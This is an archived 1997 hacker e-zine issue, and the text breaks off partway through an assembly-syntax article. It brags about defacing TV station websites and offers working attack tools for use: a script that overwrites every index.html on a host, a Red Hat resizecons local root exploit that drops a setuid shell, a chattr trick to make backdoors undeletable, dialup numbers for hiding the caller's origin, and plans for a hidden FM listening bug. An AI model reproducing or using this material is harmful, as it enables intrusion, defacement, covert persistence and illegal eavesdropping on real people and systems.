Hackers Handbook - Millenium Edition

home *** CD-ROM | disk | FTP | other *** search

/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / magazines / crh / crh005.txt < prev next >

Wrap

Text File | 1998-06-25 | 86.1 KB | 2,501 lines

─────────────────────────────────────────────────────────────────────────────── .oO The CodeZero Oo. .oO Presents Oo. ─────────────────────────────────────────────────────────────────────────────── Welcome to issue 5 of.. /IIIIIIIIII /IIIIIIIIII /III /III \ III_____/ \ III___/III \ III \ III \ III \ III \ III \ III \_III \ III onfidence \ IIIIIIII emains \ IIIIIIIIII igh \ III \ III__/III \ III__/ III \ III \ III \ III \ III \ III \ IIIIIIIIII ___ \ III \ III ___ \ III \ III ___ \_________/ /\__\ \__/ \__/ /\__\ \__/ \__/ /\__\ \/__/ \/__/ \/__/ ...23rd October 1997 ─────────────────────────────────────────────────────────────────────────────── Team CodeZero, we rule your weak network. ─────────────────────────────────────────────────────────────────────────────── .-----------[ An Official ]-----------. : .-----. .----. .--.--. : : : .--' : .-. : : : : : !_-:: : : : `-' ; : . : ::-_! :~-:: :: : :: . : :: : ::-~: : ::.`--. ::.: : ::.: : : : `-----' `--'--' `--'--' : !_-:: ::-_! :~-::-[ Confidence Remains High ]-::-~: :~-:: ::-~: `-----------[ Production ]------------' ─────────────────────────────────────────────────────────────────────────────── In This "2500 lined (count 'em -- so1o)" Issue : ─────────────────────────────────────────────────────────────────────────────── -----=> Section A : Introduction And Cover Story. 1. Confidence Remains High issue 5....................: Tetsu Khan 2. 0wning TV stations is cool.........................: so1o -----=> Section B : Exploits And Code. 1. Gerbil.c...........................................: TFreak (mods by Shok) 2. Replaceit.sh.......................................: Shok / so1o 3. Security.sh........................................: Berkeley 4. Wozzeck.sh.........................................: Dave M. 5. Chattr tekneeq.....................................: xFli -----=> Section C : Phones / Scanning / Radio. 1. 617 dialups........................................: zer0x 2. FM radio bugs......................................: xFli -----=> Section D : Miscellaneous. 1. AT&T and Intel assembly syntax.....................: Shok 2. sIn inf0z..........................................: so1o 3. Wassup with NT?!...................................: Crystalize 4. More #hebrew.......................................: so1o 5. Linking to /dev/zero...............................: xFli 6. Creating a crypto-worm (philosophy)................: Shok -----=> Section E : World News (nothings happened this month) ------=> Section F : Projects. 1. TOTALCON '98...................................: so1o 2. Security / Monitoring tools....................: Shok 3. PornBot........................................: TFreak -----=> Section G : The End. (+ Personal Column) ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. Confidence Remains High issue 5 : Tetsu Khan ─────────────────────────────────────────────────────────────────────────────── Yet another issue of Confidence Remains High! Only 15 more to go until the 1/1/00..In this crh005.zip we have included TFreak's pornbot, johan's awaited sirc4 code, and xFli's FM transmitter schematics, we all hope you enjoy reading this issue of Confidence Remains High, I definately think its our best issue yet..Distro sites are messed up, I'm gonna have to get our new permenant domain as soon as I can. Until issue 6, enjoy! The distro list.. ================= www.technotronic.com /ezines/crh/ ftp.linuxwarez.com /pub/crh/ ─────────────────────────────────────────────────────────────────────────────── 2. 0wning TV stations is cool : so1o ─────────────────────────────────────────────────────────────────────────────── As you may well know, we took control of 2 television stations web servers in the Fort ... area, some of my friends live in the immediate area, and the hack was on the morning news, it was cool, we were on TV!@#~ It is currently on videotape, we will be getting it into an .avi or .mpg asap, then you can phear our elite tv tekneeq, until then, here's an acsii representation of the sites exploited (also check out www.hacked.net) : ------------------------------------------------------------------------------ [ wE oWN yOUR aIRWAVES!!!@~#~!~@ ] ------------------------------------------------------------------------------ [ w3lc0m3 t0 th3 c0d3z3r0 ph34r n4t10n!@# ] ------------------------------------------------------------------------------ You know the deal, we 0wn your sites, make you look stupid, you try to catch us, but you don't know who, or where we are, we are just ghosts, ghosts your machines, you should learn to phear. ------------------------------------------------------------------------------ And tonight on CodeZero tV... ----------------------------- An Introduction To RealDoll Bill Gates Exclusive Interview Why Not Websearch For "codezero" ? ------------------------------------------------------------------------------ 0wned (0'wn3d) The act of showing how fucking dumb a sysadmin can be. See sekurity. ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. Gerbil.c : TFreak (modified by Shok) ─────────────────────────────────────────────────────────────────────────────── /* * gerbil.c by TFreak [1.1 - 08/06/1997] * This is an encryption program.... * * Few modifications by Shok..... * Modified by Shok to allow you to output the encrypted file to a * different file other than the original (this original version by * TFreak overwrote the file) * */ #include <stdio.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <signal.h> #include <unistd.h> #include <termios.h> #define BSIZE 1024 #define ERROR -1 char *OutputFile; void getkey (char *); void setTerm (int); void sighandler (void); void main (int argc, char **argv) { int fd, fd1, i, len, cycle = 0; long filesize, oldoffset; char key[BSIZE], plain, enc; if (argc < 3) { fprintf(stderr, "usage: %s <input filename> <output filename>\n", argv[0]); exit(ERROR); } OutputFile = argv[2]; /* open our file, grab errors */ if ((fd = open(argv[1], O_RDONLY)) == ERROR) { perror("opening input file for reading"); exit(ERROR); } if ((fd1 = open(argv[2], O_CREAT|O_WRONLY, S_IREAD|S_IWRITE)) == ERROR) { perror("opening output file for writing"); exit(ERROR); } /* get our key that were going to be using */ setTerm(0); getkey(&key[0]); setTerm(1); putchar('\n'); printf("Encrypting %s to %s....\nPlease wait.\n", argv[1], argv[2]); /* ignore Ctrl-C after we got key */ signal(SIGINT, (void *)sighandler); signal(SIGKILL, (void *)sighandler); /* get the size of the file we're working with */ if ((filesize = lseek(fd, 0L, SEEK_END)) == ERROR) { perror("reading file"); close(fd); exit(ERROR); } for (len = 0; len < strlen(key); len++) { oldoffset = lseek(fd, 0L, SEEK_SET); cycle = len; for (i = 0; i < filesize; i++, cycle++) { oldoffset = lseek(fd, 0, SEEK_CUR); if (read(fd, &plain, 1) == ERROR) { perror("reading file"); close(fd); exit(ERROR); } if (key[cycle] == '\0') cycle = 0; enc = ~plain ^ key[cycle]; lseek(fd1, oldoffset, SEEK_SET); if (write(fd1, &enc, 1) == ERROR) { perror("writing to file"); close(fd); exit(ERROR); } } } puts(""); } void getkey (char *ptrkey) { char key2[BSIZE/2], salt[3]; /* set a timer so we dont loop forever */ alarm(60); while (1) { printf("Key: "); fgets(ptrkey, BSIZE/2, stdin); if (ptrkey[0] == '\n') continue; if (strlen(ptrkey) < 2) { fprintf(stderr, "\nKey must be at least 2 characters\n"); continue; } printf("\nAgain: "); fgets(key2, BSIZE/2, stdin); if ((strcmp(ptrkey, key2)) == 0) break; else fprintf(stderr, "\nKeys do not match\n"); } salt[0] = ptrkey[1]; salt[1] = ptrkey[0]; salt[2] = '\0'; strcat(ptrkey, crypt(salt, ptrkey)); salt[0] = ptrkey[0]; salt[1] = ptrkey[1]; salt[2] = '\0'; strcat(ptrkey, crypt(salt, ptrkey)); alarm(0); } void setTerm (int mode) { static struct termios old, new; if (mode == 0) { tcgetattr(fileno(stdin), &old); memcpy(&new, &old, sizeof(struct termios)); new.c_lflag &= ~(ICANON|ECHO); tcsetattr(fileno(stdin), TCSANOW, &new); } else tcsetattr(fileno(stdin), TCSANOW, &old); } void sighandler() { printf("\nReceive abort.......exiting now.\n"); printf("Output file was NOT saved.\n"); unlink(OutputFile); exit(1); } ─────────────────────────────────────────────────────────────────────────────── 2. Replaceit.sh : Shok / so1o ─────────────────────────────────────────────────────────────────────────────── Replaces ALL index.html files on the system with the one you specify as the second argument. Obviously this is useful on a large webhosting site ;) #!/bin/sh # This isn't really a script but ya know that's life... # This was just made to make life a little easier -- # # Use with -- sh replaceit.sh <thefile.html> if [ $1 == "" ] then echo "Usage: replaceit.sh <file>" echo "This will replace every index.html on the system with <file>" else find / -name "index.html" -print -exec cp -f $1 {} \; 2>/dev/null & echo "Okay it's running in the background...enjoy :)" fi ─────────────────────────────────────────────────────────────────────────────── 3. Security.sh : Berkeley ─────────────────────────────────────────────────────────────────────────────── #!/bin/sh - # # @(#)security 8.1 (Berkeley) 6/9/93 # PATH=/sbin:/usr/sbin:/bin:/usr/bin umask 077 ERR=/tmp/_secure1.$$ TMP1=/tmp/_secure2.$$ TMP2=/tmp/_secure3.$$ TMP3=/tmp/_secure4.$$ LIST=/tmp/_secure5.$$ OUTPUT=/tmp/_secure6.$$ trap 'rm -f $ERR $TMP1 $TMP2 $TMP3 $LIST $OUTPUT' 0 # Check the master password file syntax. MP=/etc/master.passwd awk -F: '{ if ($0 ~ /^[ ]*$/) { printf("Line %d is a blank line.\n", NR); next; } if (NF != 10) printf("Line %d has the wrong number of fields.\n", NR); if ($1 !~ /^[A-Za-z0-9]*$/) printf("Login %s has non-alphanumeric characters.\n", $1); if (length($1) > 16) printf("Login %s has more than 16 characters.\n", $1); if ($2 == "") printf("Login %s has no password.\n", $1); if (length($2) != 13 && length($2) != 20 && \ ($10 ~ /.*sh$/ || $10 == "")) printf("Login %s is off but still has a valid shell.\n", $1); if ($3 == 0 && $1 != "root" && $1 != "toor") printf("Login %s has a user id of 0.\n", $1); if ($3 < 0) printf("Login %s has a negative user id.\n", $1); if ($4 < 0) printf("Login %s has a negative group id.\n", $1); }' < $MP > $OUTPUT if [ -s $OUTPUT ] ; then printf "\nChecking the $MP file:\n" cat $OUTPUT fi awk -F: '{ print $1 }' $MP | sort | uniq -d > $OUTPUT if [ -s $OUTPUT ] ; then printf "\n$MP has duplicate user names.\n" column $OUTPUT fi awk -F: '{ if ($1 != "toor") print $1 " " $3 }' $MP | sort -n +1 | tee $TMP1 | uniq -d -f 1 | awk '{ print $2 }' > $TMP2 if [ -s $TMP2 ] ; then printf "\n$MP has duplicate user id's.\n" while read uid; do grep -w $uid $TMP1 done < $TMP2 | column fi # Backup the master password file; a special case, the normal backup # mechanisms also print out file differences and we don't want to do # that because this file has encrypted passwords in it. CUR=/var/backups/`basename $MP`.current BACK=/var/backups/`basename $MP`.backup if [ -s $CUR ] ; then if cmp -s $CUR $MP; then : else cp -p $CUR $BACK cp -p $MP $CUR chown root.wheel $CUR fi else cp -p $MP $CUR chown root.wheel $CUR fi # Check the group file syntax. GRP=/etc/group awk -F: '{ if ($0 ~ /^[ ]*$/) { printf("Line %d is a blank line.\n", NR); next; } if (NF != 4) printf("Line %d has the wrong number of fields.\n", NR); if ($1 !~ /^[A-za-z0-9]*$/) printf("Group %s has non-alphanumeric characters.\n", $1); if (length($1) > 8) printf("Group %s has more than 8 characters.\n", $1); if ($3 !~ /[0-9]*/) printf("Login %s has a negative group id.\n", $1); }' < $GRP > $OUTPUT if [ -s $OUTPUT ] ; then printf "\nChecking the $GRP file:\n" cat $OUTPUT fi awk -F: '{ print $1 }' $GRP | sort | uniq -d > $OUTPUT if [ -s $OUTPUT ] ; then printf "\n$GRP has duplicate group names.\n" column $OUTPUT fi # Check for root paths, umask values in startup files. # The check for the root paths is problematical -- it's likely to fail # in other environments. Once the shells have been modified to warn # of '.' in the path, the path tests should go away. > $TMP1 > $OUTPUT rhome=/root umaskset=no list="/etc/csh.cshrc /etc/csh.login ${rhome}/.cshrc ${rhome}/.login" for i in $list ; do if [ -f $i ] ; then if egrep umask $i > /dev/null ; then umaskset=yes fi egrep umask $i | awk '$2 % 100 < 20 \ { print "Root umask is group writeable" } $2 % 10 < 2 \ { print "Root umask is other writeable" }' >> $OUTPUT /bin/csh -f -s << end-of-csh > /dev/null 2>&1 unset path source $i /bin/ls -ldgT \$path > $TMP1 end-of-csh awk '{ if ($10 ~ /^\.$/) { print "The root path includes ."; next; } } $1 ~ /^d....w/ \ { print "Root path directory " $10 " is group writeable." } \ $1 ~ /^d.......w/ \ { print "Root path directory " $10 " is other writeable." }' \ < $TMP1 >> $OUTPUT fi done if [ $umaskset = "no" -o -s $OUTPUT ] ; then printf "\nChecking root csh paths, umask values:\n$list\n" if [ -s $OUTPUT ]; then cat $OUTPUT fi if [ $umaskset = "no" ] ; then printf "\nRoot csh startup files do not set the umask.\n" fi fi > $OUTPUT rhome=/root umaskset=no list="${rhome}/.profile" for i in $list; do if [ -f $i ] ; then if egrep umask $i > /dev/null ; then umaskset=yes fi egrep umask $i | awk '$2 % 100 < 20 \ { print "Root umask is group writeable" } \ $2 % 10 < 2 \ { print "Root umask is other writeable" }' >> $OUTPUT /bin/sh << end-of-sh > /dev/null 2>&1 PATH= . $i list=\`echo \$PATH | /usr/bin/sed -e 's/:/ /g'\` /bin/ls -ldgT \$list > $TMP1 end-of-sh awk '{ if ($10 ~ /^\.$/) { print "The root path includes ."; next; } } $1 ~ /^d....w/ \ { print "Root path directory " $10 " is group writeable." } \ $1 ~ /^d.......w/ \ { print "Root path directory " $10 " is other writeable." }' \ < $TMP1 >> $OUTPUT fi done if [ $umaskset = "no" -o -s $OUTPUT ] ; then printf "\nChecking root sh paths, umask values:\n$list\n" if [ -s $OUTPUT ]; then cat $OUTPUT fi if [ $umaskset = "no" ] ; then printf "\nRoot sh startup files do not set the umask.\n" fi fi # Root and uucp should both be in /etc/ftpusers. if egrep root /etc/ftpusers > /dev/null ; then : else printf "\nRoot not listed in /etc/ftpusers file.\n" fi if egrep uucp /etc/ftpusers > /dev/null ; then : else printf "\nUucp not listed in /etc/ftpusers file.\n" fi # Uudecode should not be in the /etc/aliases file. if egrep 'uudecode:.*\||decode:.*\|' /etc/aliases; then printf "\nProgram entry for uudecode exists in the /etc/aliases file.\n" fi # Files that should not have + signs. list="/etc/hosts.equiv /etc/hosts.lpd" for f in $list ; do if egrep '\+' $f > /dev/null ; then printf "\nPlus sign in $f file.\n" fi done # Check for special users with .rhosts files. Only root and toor should # have a .rhosts files. Also, .rhosts files should not have plus signs. awk -F: '$1 != "root" && $1 != "toor" && \ ($3 < 100 || $1 == "ftp" || $1 == "uucp") \ { print $1 " " $6 }' /etc/passwd | while read uid homedir; do if [ -f ${homedir}/.rhosts ] ; then rhost=`ls -ldgT ${homedir}/.rhosts` printf "$uid: $rhost\n" fi done > $OUTPUT if [ -s $OUTPUT ] ; then printf "\nChecking for special users with .rhosts files:\n" cat $OUTPUT fi awk -F: '{ print $1 " " $6 }' /etc/passwd | \ while read uid homedir; do if [ -f ${homedir}/.rhosts ] && \ egrep '\+' ${homedir}/.rhosts > /dev/null 2>&1; then printf "$uid: + in .rhosts file.\n" fi done > $OUTPUT if [ -s $OUTPUT ] ; then printf "\nChecking .rhosts files syntax:\n" cat $OUTPUT fi # Check home directories. Directories should not be owned by someone else # or writeable. awk -F: '{ print $1 " " $6 }' /etc/passwd | \ while read uid homedir; do if [ -d ${homedir}/ ] ; then file=`ls -ldgT ${homedir}` printf "$uid $file\n" fi done | awk '$1 != $4 && $4 != "root" \ { print "user " $1 " home directory is owned by " $4 } $2 ~ /^-....w/ \ { print "user " $1 " home directory is group writeable" } $2 ~ /^-.......w/ \ { print "user " $1 " home directory is other writeable" }' > $OUTPUT if [ -s $OUTPUT ] ; then printf "\nChecking home directories:\n" cat $OUTPUT fi # Files that should not be owned by someone else or readable. list=".netrc .rhosts" awk -F: '{ print $1 " " $6 }' /etc/passwd | \ while read uid homedir; do for f in $list ; do file=${homedir}/${f} if [ -f $file ] ; then printf "$uid $f `ls -ldgT $file`\n" fi done done | awk '$1 != $5 && $5 != "root" \ { print "user " $1 " " $2 " file is owned by " $5 } $3 ~ /^-...r/ \ { print "user " $1 " " $2 " file is group readable" } $3 ~ /^-......r/ \ { print "user " $1 " " $2 " file is other readable" } $3 ~ /^-....w/ \ { print "user " $1 " " $2 " file is group writeable" } $3 ~ /^-.......w/ \ { print "user " $1 " " $2 " file is other writeable" }' > $OUTPUT # Files that should not be owned by someone else or writeable. list=".bashrc .cshrc .emacs .emacsrc .exrc .forward .klogin .login \ .logout .profile .tcshrc" awk -F: '{ print $1 " " $6 }' /etc/passwd | \ while read uid homedir; do for f in $list ; do file=${homedir}/${f} if [ -f $file ] ; then printf "$uid $f `ls -ldgT $file`\n" fi done done | awk '$1 != $5 && $5 != "root" \ { print "user " $1 " " $2 " file is owned by " $5 } $3 ~ /^-....w/ \ { print "user " $1 " " $2 " file is group writeable" } $3 ~ /^-.......w/ \ { print "user " $1 " " $2 " file is other writeable" }' >> $OUTPUT if [ -s $OUTPUT ] ; then printf "\nChecking dot files:\n" cat $OUTPUT fi # Mailboxes should be owned by user and unreadable. ls -l /var/mail | sed 1d | \ awk '$3 != $9 && $9 != "."$3".pop"\ { print "user " $9 " mailbox is owned by " $3 } $1 != "-rw-------" \ { print "user " $9 " mailbox is " $1 ", group " $4 }' > $OUTPUT if [ -s $OUTPUT ] ; then printf "\nChecking mailbox ownership:\n" cat $OUTPUT fi # File systems should not be globally exported. if [ -s /etc/exports ] ; then awk '{ readonly = 0; for (i = 2; i <= NF; ++i) { if ($i ~ /-ro/) readonly = 1; else if ($i !~ /^-/) next; } if (readonly) print "File system " $1 " globally exported, read-only." else print "File system " $1 " globally exported, read-write." }' < /etc/exports > $OUTPUT if [ -s $OUTPUT ] ; then printf "\nChecking for globally exported file systems:\n" cat $OUTPUT fi fi # Display any changes in setuid files and devices. printf "\nChecking setuid files and devices:\n" (find / ! -fstype local -a -prune -o \ $ -perm -u+s -o -perm -g+s -o ! -type d -a ! -type f -a ! -type l -a \ ! -type s $ | \ sort | sed -e 's/^/ls -ldgT /' | sh > $LIST) 2> $OUTPUT # Display any errors that occurred during system file walk. if [ -s $OUTPUT ] ; then printf "Setuid/device find errors:\n" cat $OUTPUT printf "\n" fi # Display any changes in the setuid file list. egrep -v '^[bc]' $LIST > $TMP1 if [ -s $TMP1 ] ; then # Check to make sure uudecode isn't setuid. if grep -w uudecode $TMP1 > /dev/null ; then printf "\nUudecode is setuid.\n" fi CUR=/var/backups/setuid.current BACK=/var/backups/setuid.backup if [ -s $CUR ] ; then if cmp -s $CUR $TMP1 ; then : else > $TMP2 join -110 -210 -v2 $CUR $TMP1 > $OUTPUT if [ -s $OUTPUT ] ; then printf "Setuid additions:\n" tee -a $TMP2 < $OUTPUT printf "\n" fi join -110 -210 -v1 $CUR $TMP1 > $OUTPUT if [ -s $OUTPUT ] ; then printf "Setuid deletions:\n" tee -a $TMP2 < $OUTPUT printf "\n" fi sort +9 $TMP2 $CUR $TMP1 | \ sed -e 's/[ ][ ]*/ /g' | uniq -u > $OUTPUT if [ -s $OUTPUT ] ; then printf "Setuid changes:\n" column -t $OUTPUT printf "\n" fi cp $CUR $BACK cp $TMP1 $CUR fi else printf "Setuid additions:\n" column -t $TMP1 printf "\n" cp $TMP1 $CUR fi fi # Check for block and character disk devices that are readable or writeable # or not owned by root.operator. >$TMP1 DISKLIST="dk hd hk hp jb kra ra rb rd rl rx rz sd up wd" for i in $DISKLIST; do egrep "^b.*/${i}[0-9][0-9]*[a-h]$" $LIST >> $TMP1 egrep "^c.*/r${i}[0-9][0-9]*[a-h]$" $LIST >> $TMP1 done awk '$3 != "root" || $4 != "operator" || $1 !~ /.rw-r-----/ \ { printf("Disk %s is user %s, group %s, permissions %s.\n", \ $10, $3, $4, $1); }' < $TMP1 > $OUTPUT if [ -s $OUTPUT ] ; then printf "\nChecking disk ownership and permissions:\n" cat $OUTPUT printf "\n" fi # Display any changes in the device file list. egrep '^[bc]' $LIST | sort +9 > $TMP1 if [ -s $TMP1 ] ; then CUR=/var/backups/device.current BACK=/var/backups/device.backup if [ -s $CUR ] ; then if cmp -s $CUR $TMP1 ; then : else > $TMP2 join -110 -210 -v2 $CUR $TMP1 > $OUTPUT if [ -s $OUTPUT ] ; then printf "Device additions:\n" tee -a $TMP2 < $OUTPUT printf "\n" fi join -110 -210 -v1 $CUR $TMP1 > $OUTPUT if [ -s $OUTPUT ] ; then printf "Device deletions:\n" tee -a $TMP2 < $OUTPUT printf "\n" fi # Report any block device change. Ignore character # devices, only the name is significant. cat $TMP2 $CUR $TMP1 | \ sed -e '/^c/d' | \ sort +9 | \ sed -e 's/[ ][ ]*/ /g' | \ uniq -u > $OUTPUT if [ -s $OUTPUT ] ; then printf "Block device changes:\n" column -t $OUTPUT printf "\n" fi cp $CUR $BACK cp $TMP1 $CUR fi else printf "Device additions:\n" column -t $TMP1 printf "\n" cp $TMP1 $CUR fi fi # Check special files. # Check system binaries. # # Create the mtree tree specifications using: # # mtree -cx -pDIR -kcksum,gid,mode,nlink,size,link,time,uid > DIR.secure # chown root.wheel DIR.SECURE # chmod 600 DIR.SECURE # # Note, this is not complete protection against Trojan horsed binaries, as # the hacker can modify the tree specification to match the replaced binary. # For details on really protecting yourself against modified binaries, see # the mtree(8) manual page. if cd /etc/mtree; then mtree -e -p / -f /etc/mtree/special > $OUTPUT if [ -s $OUTPUT ] ; then printf "\nChecking special files and directories:\n" cat $OUTPUT fi > $OUTPUT for file in *.secure; do tree=`sed -n -e '3s/.* //p' -e 3q $file 2>/dev/null` mtree -f $file -p $tree > $TMP1 2>/dev/null if [ -s $TMP1 ]; then printf "\nChecking $tree:\n" >> $OUTPUT cat $TMP1 >> $OUTPUT fi done if [ -s $OUTPUT ] ; then printf "\nChecking system binaries:\n" cat $OUTPUT fi fi # List of files that get backed up and checked for any modifications. Each # file is expected to have two backups, /var/backups/file.{current,backup}. # Any changes cause the files to rotate. if [ -s /etc/changelist ] ; then for file in `cat /etc/changelist`; do CUR=/var/backups/`basename $file`.current BACK=/var/backups/`basename $file`.backup if [ -s $file ]; then if [ -s $CUR ] ; then diff $CUR $file > $OUTPUT if [ -s $OUTPUT ] ; then printf "\n======\n%s diffs (OLD < > NEW)\n======\n" $file cat $OUTPUT cp -p $CUR $BACK cp -p $file $CUR chown root.wheel $CUR $BACK fi else cp -p $file $CUR chown root.wheel $CUR fi fi done fi ─────────────────────────────────────────────────────────────────────────────── 4. Wozzeck.sh : Dave M. ─────────────────────────────────────────────────────────────────────────────── #!/bin/sh # # wozzeck.sh # exploits a security hole in /usr/bin/resizecons # to create a suid root shell in /tmp/wozz on a # linux Red Hat 2.1 system. # # by Dave M. (davem@cmu.edu) : CMU is for g1mps - so1o # echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system echo ================ Checking system vulnerability if test -u /usr/bin/resizecons then echo ++++++++++++++++ System appears vulnerable. cd /tmp cat << _EOF_ > /tmp/313x37 This exploit is dedicated to Wozz. Use it with care. _EOF_ cat << _EOF_ > /tmp/restoretextmode #!/bin/sh /bin/cp /bin/sh /tmp/wozz /bin/chmod 4777 /tmp/wozz _EOF_ /bin/chmod +x /tmp/restoretextmode PATH=/tmp echo ================ Executing resizecons /usr/bin/resizecons 313x37 /bin/rm /tmp/restoretextmode /bin/rm /tmp/313x37 if test -u /tmp/wozz then echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz else echo ---------------- Exploit failed fi else echo ---------------- This machine does not appear to be vulnerable. fi ─────────────────────────────────────────────────────────────────────────────── 5. Chattr tekneeq : xFli ─────────────────────────────────────────────────────────────────────────────── Heh, another short thing: when you have made a .rhosts file on a machine, you can set filesystem attributes to make it undeletable :] simple really, but only any use on linux (ext2fs) and you have to be root to use chattr... bash# chattr +i <filename> Now when anyone, even root tries to rm or change that file, he will get an 'override mode 644?' message and then permission denied . Of course, any admin who knows how to use chattr can simply chattr -i <filename>, although it might not be immediately apparent to them that this is all due to our friend chattr :] (NB. you might want to use this in conjunction with Shok's trojan rm, incase someone finds out the trojan. It's also useful for any suid shell backdoors etc..use your imagination!) Another thing chattr can provide is secure deletion, where the blocks on the disk used by the file are changed to zero's and written back. So if you have any files of a 'sensitive' nature on your machine, you can use chattr to ease your paranoia a little ... bash# chattr -R +s /dir which will recursively add the secure deletion attrib to the files in /dir Now you can be extra sure that the data really _is_ gone if the time comes to rm it ... So all you admins, if you now realise why you cannot rm that suid shell or .rhosts file, try chattr -i <filename> ;) Of course, you all know how 'man chattr' works so you know all this already :] ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. 617 dialups : zer0x ─────────────────────────────────────────────────────────────────────────────── 617 Telnet Dialups If your not in area code 617 this may not be very usefull to you, but then again for ultimate safety you could always use this from some telnet outdial or whatever. I will try to put something in for other area codes in later issues. hello kiddies. Sometimes if you want to connect somewhere, you don't want to go through a ppp, even if it isnt legit. Personally I think ppp's are good if they're from a big isp because theres less chance of you being monitored. Some very cool people offer telnet dialups, MIT is one of them. Instead of just having ones for students they have a public one. It is called "Terminus". When you dial any of the following Terminus dialups: (617) 258-7111 (617) 258-7115 (617) 258-7116 (617) 258-7126 (617) 258-7112 When you dial up it spits some shit at you: "Welcome to the MIT Laboratory for Computer Science. You are connected to the dialup server: TERMINUS Report problems to Bug-Dialup@lcs.mit.edu Administrative questions should be directed to Dialup-Admin@lcs.mit.edu Contact Dialup-Users-Request@lcs.mit.edu for service info and updates. All users, especially guests, should get this info. Guests who use the LCS dialup servers and don't follow the guidelines are endangering the availability of dialup servers for all guests. Guest restrictions: ON at 60% OFF at 50%" And then it pops up a little telnet prompt. "Terminus>" Type ? for help, or just enter the host you want to connect to. For some hosts it now says "connection not permitted to this host". This may be because shell providers are tired of little kiddies like some of you connecting to hosts and rooting through it. . Also, sometimes for some odd reason you can't connect to some hosts. I suggest you use this in moderation. Who knows, maybe when some sysadmin will get especially pissed he will ask MIT to set up a line trace and get your #, or contact MIT and they will be forced to shut it down for ever. Or even if MIT gets pissed they may start monitoring all login sessions. So play nice, or mom my will take your dialup away. ─────────────────────────────────────────────────────────────────────────────── 2. FM radio bugs : xFli ─────────────────────────────────────────────────────────────────────────────── OK, so1o has been asking for this for ages, not to mention other people, so I finally got round to typing it up. Basically, this is a fairly small FM transmitter, powered by two 3 volt lithium cells. The only slight drawback is that it requires a 170cm antenna if you want to get decent range out of it. This isn't too much of a problem though, as it is fairly easy to hide a few feet of wire... As for performance you can expect a range of around 500m with a good antenna. The actual output is around 10mv, which is fine for our, <ahem> applications :) If you don't know what a soldering iron is or can't read circuit diagrams, it's probably not a good idea to attempt to make this, as it is fairly complicated for a beginner. Anyway, heres the parts list: 1 - 470R 1/4 watt resistor 1 - 22k " " " 1 - 47k " " " 1 - 100k " " " 1 - 1M " " " 1 - 5p6 ceramic capacitor 1 - 27p " " 1 - 47p " " 1 - 1n " " 2 - 22n " " 1 - 100n monoblock (monolithic) 2 - BC 547 transistors 1 - electret mic insert (small == good :) 2 - 3v Lithium cells 1 - Single pole double throw (SPDT) mini slide switch enamelled .5mm copper wire hookup wire shrinkwrap tubing It is best to make a PCboard from the diagram supplied, as the positioning of the components is quite important. You could also try using veroboard to make a similar layout... OK, most of this is fairly straightforward, but there are a few things you need to be careful with. You will need to make 2 coils with the enamelled wire. To do this, use a match to burn the enamel off the wire and clean off the black residue left over. You need something cylindrical and 2 mm in diameter as a former for winding the coils. The first coil needs 8 turns of .5 mm wire, and the second needs 5 turns. The second thing to remember is that the transistors _must_ be kept as close the the board as possible, so they dont stick up higher than any of the other components. The coils should be touching the board as well. If you deviate from the original layout a lot, there is a good chance the thing will be very sensitive to enviromental changes, such as temperature or being touched. The project is not designed to be carried around in use, although if a good casing was made as opposed to shrinkwrap, it might become more stable. The ideal application is to have the transmitter taped under a desk, with the arial running straight down the back. If you are looking for good electret mic's, you can get really good ones out of dead mobile's :) You should also ensure you dont over heat components when you are soldering, especially the transistors and the mic. Right, so grab the diags and go build it :) I'll leave the attachment of the two cells up to you, but I _don't_ recommmend attempting to solder them :) The best arrangement is to tape the two cells together with wires on the top and bottom as shown in my mad ascii art: -----========== (+) [^^^^^^^^^^^^^^^^^^] \__________________/ [^^^^^^^^^^^^^^^^^^] \__________________/ -----========== (-) OK, so you have built it, and you want to know how to use it... The bug transmit's around the 88 - 108 FM range, and can be picked up with any FM radio. To adjust the frequency, squeeze together the turns of the 5 turn coil (oscillator coil) to shift the frequency up the range, and seperate the turns to move down the range. To test it, place it near a radio and tune over the whole FM band, and at some point near the lower end, you should hear a feedback whistle. Adjust the coil unti you get a frequency that is good (i.e free) and then you are ready for action :) Its a good idea to shrinkwrap the project, but make sure you dont mess up the coils when you shrink it. Thats all... I will put plans for a much more elaborate and enhanced bug in crh (with Voice Operated Transmit and surface mount components for small size :) as soon as I can be fucked with typing it up... ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. AT&T and Intel assembly syntax. ─────────────────────────────────────────────────────────────────────────────── Difference Between AT&T and Intel Assembly Syntax ------------------------------------------------- By (--==+*~Shok~*+==--) The difference -------------- This document is more related to coding than hacking, although assembly is a very useful programming language, as it's machine level and gives you the most direct access to the CPU, hardware, etc. Now in unix, the compilers like gcc use att syntax assembly and not intel. For example: __asm__("movl %esp, %ebp"); Now this is unfortunate for DOS asm programmers who recently installed linux. Asm they don't know att syntax (they are used to intel)..who are used to mov ebp, esp from the above example. So I added this because I've very rarely (only one in fact, to be honest), document that explained (yah, it wasn't even a tutorial or anything ;) the differences, how to get used to it etc. First off, I'd like to mention the only place I've seen any documentation on it, which was the manual for gas (which is GNU asm....gnu's assembler). You can get info on that at: http://www.cs.utah.edu/csinfo/texinfo under "gas" First let me give a few examples. Intel: push 4 att: pushl $4 All the immediate operands have a $ in front of them, in intel syntax, you don't have prefix. The register operands, have a % in front of them, intel has none. Intel: mov eax, 4 att: movl $4, %eax You notice there is a diff in intel/att's src/dst... Intel: you do dst, src like mov ax, 2 att: it's the opposite, src, dst like movl $2, %ax You can use 'b' for byte, 'w' for word, 'l' for long, etc...as the memory suffix: movl, movb, movw etc.... in intel you wold do this like mov ax, byte ptr foo... The far instruction for att is lret $stack-adjust, in intel it's ret far stack-adjust. The l in 